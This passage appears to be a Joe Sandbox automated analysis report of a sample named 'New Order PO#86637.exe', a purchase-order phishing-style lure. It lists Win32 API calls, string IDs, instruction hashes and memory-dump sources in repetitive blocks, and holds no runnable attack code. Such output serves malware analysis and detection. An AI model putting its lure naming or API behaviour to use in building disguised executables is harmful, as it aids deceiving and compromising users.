                                                                            • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                                                            • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                            • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                            • API String ID: 2483343779-2107944366
                                                                            • Opcode ID: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                                                            • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                                                                            • Opcode Fuzzy Hash: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                                                            • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                                                            • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                                                            • _wcslen.LIBCMT ref: 00450720
                                                                            • _wcscat.LIBCMT ref: 00450733
                                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                                                            • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window_wcscat_wcslen
                                                                            • String ID: -----$SysListView32
                                                                            • API String ID: 4008455318-3975388722
                                                                            • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                            • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                                                            • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                            • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                                                                            APIs
                                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                            • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                                                            • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                                                            • GetParent.USER32 ref: 00469C98
                                                                            • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                                                            • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                                                            • GetParent.USER32 ref: 00469CBC
                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 2360848162-1403004172
                                                                            • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                            • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                                                                            • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                            • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                                                                            APIs
                                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                            • SendMessageW.USER32(00000186,00000186,?,00000000), ref: 00469E71
                                                                            • GetDlgCtrlID.USER32(00000000), ref: 00469E82
                                                                            • GetParent.USER32 ref: 00469E96
                                                                            • SendMessageW.USER32(00000000,?,00000111), ref: 00469E9D
                                                                            • GetDlgCtrlID.USER32(00000000), ref: 00469EA3
                                                                            • GetParent.USER32 ref: 00469EBA
                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469EC1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 2360848162-1403004172
                                                                            • Opcode ID: 986fe2d2ad3502a89dd9d9f189f0f45c93be64f12821e5ba271ad6af13960510
                                                                            • Instruction ID: 3a0c9dd1fa5fd4c1d1a647422213a645dfa1e4764d365342f395b6f430504e68
                                                                            • Opcode Fuzzy Hash: 986fe2d2ad3502a89dd9d9f189f0f45c93be64f12821e5ba271ad6af13960510
                                                                            • Instruction Fuzzy Hash: D121F7716001187BDB00ABA9CC85BBF77ACEB85310F00855FFA44EB2D5D6B8DC4587A5
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                                                                            • String ID:
                                                                            • API String ID: 262282135-0
                                                                            • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                            • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                                                                            • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                            • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                                                                            APIs
                                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                                                            • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                                                            • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                                                            • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                                                            • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                                                            • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$LongWindow
                                                                            • String ID:
                                                                            • API String ID: 312131281-0
                                                                            • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                            • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                                                            • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                            • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                                                            APIs
                                                                              • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                                            • SendMessageW.USER32(75A923D0,00001001,00000000,?), ref: 00448E16
                                                                            • SendMessageW.USER32(75A923D0,00001026,00000000,?), ref: 00448E25
                                                                              • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                            • String ID:
                                                                            • API String ID: 3771399671-0
                                                                            • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                            • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                                                                            • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                            • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 00434643
                                                                            • GetForegroundWindow.USER32(00000000), ref: 00434655
                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                            • String ID:
                                                                            • API String ID: 2156557900-0
                                                                            • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                            • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                                                            • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                            • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                            • API String ID: 0-1603158881
                                                                            • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                            • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                                                                            • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                            • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                                                                            APIs
                                                                            • CreateMenu.USER32 ref: 00448603
                                                                            • SetMenu.USER32(?,00000000), ref: 00448613
                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                                                            • IsMenu.USER32(?), ref: 004486AB
                                                                            • CreatePopupMenu.USER32 ref: 004486B5
                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                                                            • DrawMenuBar.USER32 ref: 004486F5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                            • String ID: 0
                                                                            • API String ID: 161812096-4108050209
                                                                            • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                            • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                                                            • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                            • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,C:\Users\user\Desktop\New Order PO#86637.exe), ref: 00434057
                                                                            • LoadStringW.USER32(00000000), ref: 00434060
                                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                                                            • LoadStringW.USER32(00000000), ref: 00434078
                                                                            • _wprintf.LIBCMT ref: 004340A1
                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                                                            Strings
                                                                            • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                                                            • C:\Users\user\Desktop\New Order PO#86637.exe, xrefs: 00434040
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: HandleLoadModuleString$Message_wprintf
                                                                            • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\New Order PO#86637.exe
                                                                            • API String ID: 3648134473-2016584718
                                                                            • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                            • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                                                            • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                            • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                                                                            • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                                                                            • Opcode Fuzzy Hash: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                                                                            • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                            • Instruction ID: d12da5a9263b129e99c802cec43d72d92cc496201e336192e500ad81068e5f87
                                                                            • Opcode Fuzzy Hash: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                            • Instruction Fuzzy Hash: D7519C70600305ABEB20DF69CC81F9B77A8AB08715F50462AFE05DB3C1E7B5E8588B58
                                                                            APIs
                                                                              • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\New Order PO#86637.exe,0040F545,C:\Users\user\Desktop\New Order PO#86637.exe,004A90E8,C:\Users\user\Desktop\New Order PO#86637.exe,?,0040F545), ref: 0041013C
                                                                              • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                                                                            • MoveFileW.KERNEL32(?,?), ref: 00453932
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                                            • String ID:
                                                                            • API String ID: 978794511-0
                                                                            • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                            • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                                                                            • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                            • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
